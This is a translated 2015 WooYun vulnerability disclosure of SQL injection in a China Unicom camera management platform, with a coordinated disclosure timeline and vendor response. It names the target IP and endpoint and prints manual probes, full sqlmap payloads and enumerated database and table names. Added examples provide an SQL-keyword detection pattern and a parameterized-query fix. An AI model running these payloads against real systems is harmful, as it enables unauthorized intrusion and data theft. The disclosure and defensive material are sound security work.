Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0121611

Title: A China Unicom camera management platform has an SQL injection vulnerability

Vendor: 中国联通 (China Unicom)

Author: 浮萍

Submitted: 2015-07-06 17:01

Fixed: 2015-08-24 13:04

Published: 2015-08-24 13:04

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Handed over to a third-party partner organisation (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2015-07-06: Details sent to the vendor, awaiting vendor handling
2015-07-10: Vendor has confirmed; details disclosed to the vendor only
2015-07-20: Details disclosed to core whitehats and relevant domain experts
2015-07-30: Details disclosed to regular whitehats
2015-08-09: Details disclosed to intern whitehats
2015-08-24: Details disclosed to the public

Brief description:

SQL injection

Detailed description:

I happened to notice a whitehat, 我是壮丁 (http://www.wooyun.org/whitehats/我是壮丁), who got the blue verified badge with a single vulnerability report,
so I went to look at the vulnerability he had posted:
WooYun: 中国联通某摄像管理平台存在弱口令+sql注入 (a China Unicom camera management platform has a weak password and SQL injection)
and found another SQL injection there.
Address:
http://210.22.8.98/login.action
Register an account.
On the user settings page, add an authorized management user:
http://210.22.8.98/user/settingUser.action
The admin user is known to exist.
Add admin

1.jpg


The response message is normal.
Add admin'

2.jpg


Something looks wrong.
Add admin'or'1'='1

3.jpg


The response message is normal.
Then capture the request:

http://210.22.8.98/dwr/call/plaincall/DwrUserInfo.validateAppointUser.dwr?callCount=1&page=%2Fuser%2FsettingUser.action&httpSessionId=&scriptSessionId=1434695608453&c0-scriptName=DwrUserInfo&c0-methodName=validateAppointUser&c0-id=0&c0-param0=string%3Aadmin'or'1'%253D'1&batchId=2&locale=zh_CN


The request must carry the session cookie.

URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if an
y)? [y/N] n
sqlmap identified the following injection points with a total of 67 HTTP(s) requ
ests:
---
Place: URI
Parameter: #1*
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: http://210.22.8.98:80/dwr/call/plaincall/DwrUserInfo.validateAppoin
tUser.dwr?callCount=1&page=/user/settingUser.action&httpSessionId=&scriptSession
Id=1434695608453&c0-scriptName=DwrUserInfo&c0-methodName=validateAppointUser&c0-
id=0&c0-param0=-7303' OR (9955=9955)#&batchId=2&locale=zh_CN
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: http://210.22.8.98:80/dwr/call/plaincall/DwrUserInfo.validateAppoin
tUser.dwr?callCount=1&page=/user/settingUser.action&httpSessionId=&scriptSession
Id=1434695608453&c0-scriptName=DwrUserInfo&c0-methodName=validateAppointUser&c0-
id=0&c0-param0=string:' AND (SELECT 8433 FROM(SELECT COUNT(*),CONCAT(0x71786c697
1,(SELECT (CASE WHEN (8433=8433) THEN 1 ELSE 0 END)),0x71707a7071,FLOOR(RAND(0)*
2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Nimd'='Nimd&batch
Id=2&locale=zh_CN
Type: UNION query
Title: MySQL UNION query (NULL) - 3 columns
Payload: http://210.22.8.98:80/dwr/call/plaincall/DwrUserInfo.validateAppoin
tUser.dwr?callCount=1&page=/user/settingUser.action&httpSessionId=&scriptSession
Id=1434695608453&c0-scriptName=DwrUserInfo&c0-methodName=validateAppointUser&c0-
id=0&c0-param0=string:' UNION ALL SELECT CONCAT(0x71786c6971,0x66616a73435941424
854,0x71707a7071),NULL,NULL#&batchId=2&locale=zh_CN
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: http://210.22.8.98:80/dwr/call/plaincall/DwrUserInfo.validateAppoin
tUser.dwr?callCount=1&page=/user/settingUser.action&httpSessionId=&scriptSession
Id=1434695608453&c0-scriptName=DwrUserInfo&c0-methodName=validateAppointUser&c0-
id=0&c0-param0=string:' AND 7962=BENCHMARK(5000000,MD5(0x424f5269)) AND 'hHRS'='
hHRS&batchId=2&locale=zh_CN
---
[14:38:29] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.0.64
back-end DBMS: MySQL 5.0
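As an added example that is not part of the original report, the following Python detection logic shows how a defender could spot probes like the captured request in web access logs: it parses the DWR `c0-param*` `string:` arguments, decodes them a second time (to cover double-encoded values such as the `%253D` in the captured URL), and flags quote or comment characters and obvious SQL keywords in a field that should only ever hold a user name. The log lines are constructed for the example; only the endpoint path and parameter names are taken from the report.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access-log lines (not from the report). The request paths and
# parameter names mirror the DWR endpoint named in the report; the client addresses,
# timestamps and response sizes are made up.
SAMPLE_LOG = """\
10.0.0.5 - - [06/Jul/2015:14:38:01 +0800] "GET /dwr/call/plaincall/DwrUserInfo.validateAppointUser.dwr?callCount=1&c0-scriptName=DwrUserInfo&c0-methodName=validateAppointUser&c0-param0=string%3Aadmin&batchId=1 HTTP/1.1" 200 312
10.0.0.5 - - [06/Jul/2015:14:38:09 +0800] "GET /dwr/call/plaincall/DwrUserInfo.validateAppointUser.dwr?callCount=1&c0-scriptName=DwrUserInfo&c0-methodName=validateAppointUser&c0-param0=string%3Aadmin'or'1'%253D'1&batchId=2 HTTP/1.1" 200 312
10.0.0.5 - - [06/Jul/2015:14:38:29 +0800] "GET /dwr/call/plaincall/DwrUserInfo.validateAppointUser.dwr?callCount=1&c0-scriptName=DwrUserInfo&c0-methodName=validateAppointUser&c0-param0=string%3A'%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%23&batchId=3 HTTP/1.1" 200 420
10.0.0.7 - - [06/Jul/2015:14:40:00 +0800] "GET /user/settingUser.action HTTP/1.1" 200 5120
"""

# The request line inside a combined-format log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
# Characters and keywords that have no place in a user name but occur in every
# probe the report shows (quote, MySQL comment markers, UNION, BENCHMARK).
SUSPICIOUS_RE = re.compile(r"'|#|--|\bunion\b|\bbenchmark\s*\(", re.IGNORECASE)


def dwr_string_params(url):
    """Yield (name, decoded value) for every DWR 'string:' argument in a request URL."""
    parts = urlsplit(url)
    if not parts.path.endswith(".dwr"):
        return
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        if not name.startswith("c0-param"):
            continue
        for value in values:
            if value.startswith("string:"):
                # parse_qs already decoded once; decode again so a double-encoded
                # payload (%253D -> %3D -> =) is inspected in its final form.
                yield name, unquote(value[len("string:"):])


def find_suspicious(log_text):
    """Return (line_no, param_name, decoded_value) for each flagged DWR argument."""
    hits = []
    for line_no, line in enumerate(log_text.splitlines(), start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        for name, value in dwr_string_params(match.group(1)):
            if SUSPICIOUS_RE.search(value):
                hits.append((line_no, name, value))
    return hits


if __name__ == "__main__":
    for line_no, name, value in find_suspicious(SAMPLE_LOG):
        print(f"line {line_no}: {name} = {value!r}")
```

Run against the sample, lines 2 and 3 are flagged (the report's manual probe and a UNION-style one), while the plain `admin` lookup and the non-DWR page view are not. In production the decoded value, not the raw query string, is what a rule should match on, since the single quote in the captured request was sent unencoded while the `=` was double-encoded.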


Databases:

available databases [5]:
[*] db_register
[*] dserver_1
[*] information_schema
[*] mysql
[*] test


Current database: 'db_register'
Its tables:

Database: db_register
[17 tables]
+---------------------+
| admin |
| admin_camera_group |
| admin_manage_camera |
| appointuser |
| appserver |
| appserverassign |
| appserverinfo |
| db_version |
| devices |
| dserver_names |
| dservers |
| groups |
| languages |
| location |
| location_names |
| news |
| users |
+---------------------+


Check the row count of the users table:

4.jpg


Proof of vulnerability:


Fix recommendation:

Everything else is filtered; was this spot overlooked?
Filing it as a generic vulnerability would require me to find more cases, so I'm not going the generic route.
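The lasting fix is to stop building the query from the submitted name at all, rather than adding one more per-endpoint filter that the next endpoint can miss again. As an added example (not the platform's code: the real `validateAppointUser` implementation and its schema are not shown in the report, so the `users` table below is an assumption), this Python/SQLite snippet puts a concatenated lookup beside a parameterized one and runs the report's three probes (`admin`, `admin'`, `admin'or'1'='1`) against both.

```python
import sqlite3

# The three inputs the report submits to the "add authorized user" check.
PROBES = ["admin", "admin'", "admin'or'1'='1"]


def make_db():
    """Constructed stand-in for the platform's users table (assumed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("admin", "admin"), ("operator", "user")])
    return conn


def user_exists_vulnerable(conn, name):
    """The pattern that produces the report's symptoms: the name is pasted into SQL text."""
    sql = "SELECT COUNT(*) FROM users WHERE username = '" + name + "'"
    return conn.execute(sql).fetchone()[0] > 0


def user_exists_safe(conn, name):
    """Parameterized lookup: the driver binds the value, so quotes inside it are data."""
    sql = "SELECT COUNT(*) FROM users WHERE username = ?"
    return conn.execute(sql, (name,)).fetchone()[0] > 0


def probe(check, name):
    """Run one lookup and report ('ok', found) or ('error', exception class name)."""
    try:
        return ("ok", check(make_db(), name))
    except sqlite3.Error as exc:
        return ("error", type(exc).__name__)


def probe_all(check):
    """Map each of the report's three inputs to its outcome under the given lookup."""
    return {name: probe(check, name) for name in PROBES}


if __name__ == "__main__":
    for label, check in (("concatenated", user_exists_vulnerable),
                         ("parameterized", user_exists_safe)):
        print(label, probe_all(check))
```

The concatenated lookup reproduces the report's sequence exactly: `admin` is found, `admin'` breaks the statement (the "something looks wrong" response), and `admin'or'1'='1` is reported as found because the condition is now true for every row. The parameterized lookup finds `admin` and treats the other two as literal, non-existent user names. Putting the lookup in one shared data-access function, as here, is also what keeps a single endpoint from being "overlooked" the way the report describes.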

Copyright notice: when reposting, please credit the source 浮萍@乌云


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 9

Confirmed: 2015-07-10 13:02

Vendor reply:

CNVD confirmed and reproduced the described issue and has forwarded it through CNCERT to China Unicom Group, which will coordinate handling with the site's management department.

Latest status:

None yet


Vulnerability rating:

Comments

  1. 2015-09-07 12:53 | 我是壮丁 Verified whitehat ( Passer-by | Rank:10 Vulnerabilities:1 | professional bystander)

    Feel free to read more of my posts.

  2. 2015-09-07 12:54 | _Thorns ( Regular whitehat | Rank:882 Vulnerabilities:157 | Buying WB at 1:5, unlimited [platform escrow])

    @我是壮丁 When it comes to bromance, nobody is a match for you.

  3. 2015-09-07 15:26 | 浮萍 ( Regular whitehat | Rank:555 Vulnerabilities:118 | quietly lurking)

    @我是壮丁 Noted.